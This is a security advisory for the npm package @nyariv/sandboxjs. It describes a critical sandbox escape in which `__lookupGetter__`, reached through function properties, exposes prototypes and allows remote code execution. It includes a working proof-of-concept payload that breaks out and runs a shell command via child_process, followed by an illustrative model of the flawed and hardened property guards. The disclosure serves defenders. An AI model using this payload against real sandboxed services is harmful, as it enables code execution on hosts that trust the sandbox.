PT-2026-6406 · Npm · @Nyariv/Sandboxjs
Published: 2026-02-02 · Updated: 2026-02-02
CVSS v3.1: 10 (Critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Summary
SandboxJS does not properly restrict `__lookupGetter__`, which can be used to obtain prototypes, which in turn can be used to escape the sandbox and achieve remote code execution.
Details
The Object prototype, which contains `__lookupGetter__`, is properly protected, but the special case for accessing function properties bypasses the prototype chain checks, including the check on the root Object prototype.
PoC
```javascript
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
// Code evaluated inside the sandbox
const payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;
console.log(
  isFinite.constructor(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);`
sb.compile(payload)().run();
```
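The flaw described under Details, reduced to a simplified model of a property-access guard with the flawed and the hardened form side by side. This is an added example, not SandboxJS source code; `PROTECTED`, `ownerOf`, `checkedGet`, `flawedGet`, `hardenedGet` and `isDenied` are hypothetical names, and the allowlist contents are constructed for illustration.

```javascript
// Added illustration: a simplified model of a sandbox property guard.
// All names here are hypothetical; this is not SandboxJS source code.

// Allowlist of properties sandboxed code may read from a protected prototype.
const PROTECTED = new Map([
  [Object.prototype, new Set(['toString', 'valueOf', 'hasOwnProperty'])],
]);

// Walk the prototype chain and return the object that actually owns `prop`.
function ownerOf(obj, prop) {
  for (let o = Object(obj); o !== null; o = Object.getPrototypeOf(o)) {
    if (Object.prototype.hasOwnProperty.call(o, prop)) return o;
  }
  return null;
}

// Full check: deny anything a protected prototype owns but does not allowlist.
function checkedGet(obj, prop) {
  const allowed = PROTECTED.get(ownerOf(obj, prop));
  if (allowed && !allowed.has(prop)) {
    throw new Error(`access to ${String(prop)} denied`);
  }
  return obj[prop];
}

// Flawed guard: function receivers take a shortcut that skips the chain walk,
// so properties inherited from Object.prototype are never checked.
function flawedGet(obj, prop) {
  if (typeof obj === 'function') return obj[prop];
  return checkedGet(obj, prop);
}

// Hardened guard: every receiver, functions included, gets the same check.
function hardenedGet(obj, prop) {
  return checkedGet(obj, prop);
}

// Helper for the checks below: true if the guard refused the access.
function isDenied(guard, obj, prop) {
  try { guard(obj, prop); return false; } catch { return true; }
}

const fn = function sample() {}; // constructed sample receiver
console.log('object, flawed guard denied:', isDenied(flawedGet, {}, '__lookupGetter__'));
console.log('function, flawed guard denied:', isDenied(flawedGet, fn, '__lookupGetter__'));
console.log('function, hardened guard denied:', isDenied(hardenedGet, fn, '__lookupGetter__'));
console.log('fn.toString, hardened guard denied:', isDenied(hardenedGet, fn, 'toString'));
```

A regression test for a guard of this kind should request each denied property through every receiver type (plain object, function, class, bound function), not only through plain objects.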
Impact
Prototype Pollution -> RCE
Fix
Code Injection
Prototype Pollution
Related Identifiers
Affected Products
@Nyariv/Sandboxjs